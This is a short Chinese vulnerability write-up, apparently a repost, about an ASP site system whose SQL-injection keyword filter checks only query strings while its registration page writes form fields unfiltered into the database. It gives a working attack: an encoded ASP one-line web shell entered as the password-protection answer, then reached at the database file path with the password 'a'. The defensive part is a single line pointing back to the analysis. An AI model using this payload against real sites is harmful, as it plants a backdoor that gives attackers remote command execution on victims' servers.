is87_sql.asp
<%
    Dim GetFlag Rem(提交方式)
    Dim ErrorSql Rem(非法字符) 
    '..略
    ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开)
    ErrorSql = split(ErrorSql,"~")
    '..略
        If Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<>0 Then
        response.write "<script>alert(""警告:\n请不要尝试非法注入！！"");history.go(-1);</script>"
    '..略 
        response.write "<script>alert(""警告:\n请不要尝试非法注入！！"");history.go(-1);</script>"
    '..略
%>

过滤问题。

www.2cto.com '\member\register_pass.asp
<!--#include file="../is87_sql.asp"--> 
<%
dim u,i,letters,ip,useradmin,userpassword,userpassword2,sh,zsname,sex,wen,da,gsname,gsadd,youbian,tel,fax,sj,mail,wz,VerifyCode
ip=request.servervariables("remote_addr")
useradmin=replace(trim(request("useradmin")),"'","") 
'..略 
zsname=request.form("zsname")
'..略
rs("userpassword")=md5(request.form("userpassword"))
rs("zsname")=zsname
rs("sex")=sex
Response.Write "<script>alert('恭喜!注册成功，返回首页进行登陆！');window.location.href='/index.asp';</script>" 
%>

直接写入数据库。

注册会员，密码保护答案：┼攠數畣整爠煥敵瑳∨≡┩>

http://www.2cto.com \data\#is87$cds.asp

密码：a

修复：见上文分析

摘自：0855.tv